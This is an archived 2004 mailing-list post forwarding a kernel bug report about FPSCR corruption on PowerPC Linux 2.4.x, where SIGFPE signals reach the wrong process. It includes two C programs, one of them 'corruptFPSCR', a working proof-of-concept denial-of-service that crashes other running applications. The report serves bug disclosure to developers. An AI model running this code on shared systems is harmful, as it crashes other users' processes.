[Tfug] [jason.mcmullan@timesys.com: FPSCR corruption]

Tom Rini trini at kernel.crashing.org
Wed Jun 16 12:08:42 MST 2004 

Since Goldarg mentioned it, here's a brand new ppc32-specific DoS.
The search I would guess, was inspired by the recent ia32 thing, but
this isn't as critical (crashing random apps, if you're lucky, not lock
the machine).

But since I haven't had time to verify this myself, I do hope I don't
end up with egg on my face. :)

----- Forwarded message from "McMullan, Jason" <jason.mcmullan at timesys.com> -----

Subject: FPSCR corruption
From: "McMullan, Jason" <jason.mcmullan at timesys.com>
To: linuxppc-embedded at lists.linuxppc.org
Date: Wed, 16 Jun 2004 14:09:51 -0400

Oddity. I'm seeing SIGFPEs arrive in the wrong process.

I'm seeing this in my 2.4.x kernels, on 8260 and 750 cpus (and anything
else that has an FPU).

Example programs attached. Run 'someFPU' in an xterm. Run 'corruptFPSCR'
in another. Watch 'someFPU' die.

Is this a similar issue to the fast-syscall-return FPU path bug that
troubled the ia64 port?

(and yes, 'corruptFPSCR' is pathological, but so are most
denial-of-service exploits)

--
Jason McMullan <jason.mcmullan at timesys.com>
TimeSys Corporation

#include <math.h>
#include <stdio.h>
#include <time.h>

int main(int argc, char * argv[])
{
	struct timespec sleeptime;
	sleeptime.tv_sec=0;
	sleeptime.tv_nsec=500000;

	while(1)
	{
		pow(2.0, 3.3);
		nanosleep(&sleeptime, NULL);
	}

	return 0;
}




#include <math.h>
#include <stdio.h>
#include <signal.h>


#define fesetenv_register(env) \
        ({ double d = (env); asm volatile ("mtfsf 0xff,%0" : : "f" (d)); })


typedef union
{
    double fenv;
    unsigned long fpscr[2];
} my_fenv_union_t;

void sigfpeHandler(int x)
{
	// Do nothing.
	// The exception will be retrown forever...
	// until it affects another process ;-(
}

int main ()
{
	// Register to SIGFPE
	signal(SIGFPE, sigfpeHandler);

	// Force the generation of a SIGFPE
	my_fenv_union_t fenvt;
	fenvt.fpscr[1] = 0xffffffff;
	fesetenv_register(fenvt.fenv);

	return 0;
}





----- End forwarded message -----

-- 
Tom Rini
http://gate.crashing.org/~trini/

More information about the tfug mailing list